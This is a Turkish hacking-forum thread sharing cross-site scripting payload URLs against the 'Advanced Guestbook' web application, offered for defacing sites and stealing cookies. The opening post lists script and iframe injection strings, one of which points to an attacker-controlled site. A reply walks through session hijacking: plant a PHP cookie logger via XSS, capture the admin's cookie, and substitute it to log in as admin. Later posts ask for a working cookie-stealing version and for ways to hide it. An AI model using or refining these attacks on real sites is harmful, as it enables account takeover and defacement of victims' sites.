GuestBook Acigi... [ Sitenin Ana Sayfasina İndex Basin... ]

P

Phara0h

Banned
Katılım
24 Eki 2005
Mesajlar
387
Reaction score
0
Puanları
0
Yaş
37
Konum
S.S.C.B
Asagidaki acikLar iLe Sitenin Ana Sayfasina İndex basabiLiriz.. Cookie CaLabiLiriz...

Bunlari kuLLanmak Biraz da oLsun Tecrube İster Bu Yuzden Hack'e 0'dan basLamis adamin Sacma Sacma SoruLarini yanitLayamam...

http://www.ornek.com/guestbook/index.php?entry=< script > alert(document.cookie);< / script>

http://www.ornek.com/guestbook/index.php?entry=< iframe
src=http://www.atakyapansite.com/>

http://www.ornek.com/guestbook/comment.php?gb_id=1< script >alert(document.cookie);< / script>

http://www.ornek.com/guestbook/comment.php?gb_id=1< IFRAME
SRC="javascript:alert('XSS Kodunuz');">< / IFRAME>

0nemLi Note : Advanced Guestbook Sisteminde isLer
 
hoca güzel döküman sende olmasan fso yapacaz:D
 
güzel iş
bilgi paylastıkca büyüyecegini bilen birisin
 
Browser : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Referer :
PHP Version : 4.3.4
OS : Linux
Server : Apache/1.3.26 (Unix) mod
denedıgım siteler
bu sekılde hata sayfası cıkıyor . acık yokmu demektir.
MySQL Error : Query Error

vb

ama guestbook ları normal çalısıyor

açıklama yapıcak vamı
 
Hangi Kodu caListirdigina bagLi ve her Guestbook'tada oLacak diye Birsey Yok... 0rnegin Bu site vBuLLetin Ben $imdi Bu Sitede ExpoLit Denesem oLacak Diye Birsey Yoq
 
gerçek xss bugu buymuş değilmi redirectiondan ne xss olur nede bug olur
 
ya ben sıfırdan başlamadım ama sorum şu...Bunları kod olarak notepad te açıp daha sonra mı hareket edicez yoksa direk olarak o kodları browser'a yapıstırıp ornek yazan yere kurban siteyi yazıp enter a mı basıcaz _? Şimididen teşekkürler...
 
ya ben sıfırdan başlamadım ama sorum şu...Bunları kod olarak notepad te açıp daha sonra mı hareket edicez yoksa direk olarak o kodları browser'a yapıstırıp ornek yazan yere kurban siteyi yazıp enter a mı basıcaz _? Şimididen teşekkürler...
Genişletmek için tıkla ...

bunları notepadde niye açacaksınki bak bu kodun anlamı şudur

Kod: 
< script > alert(document.cookie);< / script>

eğer bunu bilgisayarında çalıştırırsan senin siteye giriş yapmış olduğun cookie'n msgbox olarak ekranda gözükür şimdi diyeceksinki ben benim cookie'yi ne yapayım zaten sana sseninki lazım değil sana guestbook admininki lazım
başta bir logger yapacaksın phpde daha sonra admini bulacaksın xss kullanarak logger ı yedireceksin daha sonra nereye logladıysa adminin cookie'sini oraya bakacaksın(Bu işlem daha değişikte olabilir ama basit olanı budur bence) sonra cookie'yi alıp kendininkiyle değiştireceksin siteye girince sistem otomatikman seni admin olarak görecektir(çünkü adminin cookiesini çaldın ve kendininkiyle değiştirdin)
 
ya tamam ip log olayını anladık.onların hespsini yaparızda zamanında phpbb 16 ve eskı surumleri az hacklamadık bu yontemle

ama

http://www.ornek.com/guestbook/index.php?entry=< script > alert(document.cookie);< / script>

http://www.ornek.com/guestbook/index.php?entry=< iframe
src=http://www.atakyapansite.com/>

http://www.ornek.com/guestbook/comment.php?gb_id=1< script >alert(document.cookie);< / script>

http://www.ornek.com/guestbook/comment.php?gb_id=1< IFRAME
SRC="javascript:alert('XSS Kodunuz');">< / IFRAME>


bunların hepsi alert veren kodlar

biriniz sağlam çalısan cookıe alan seklınde yapsında ben url adreslerini değiştiririm sorun değil.


birde bunuda guestbookda yazıyoruz ama nasıl gizleriz biraz yontem anlatın bakalım. her okuyanın mı gelıyor nasıl oluyor ? phpbb forumlarda giziliyorduk okuyanınkı geliyordu bunda nasıl gelıcek.(ben kendım yontem bulurumda bakiim sizin farklı bir yontemınız varmı onu oğrencem )
 
Cevap yazmak için giriş yap yada kayıt ol.
Geri
Üst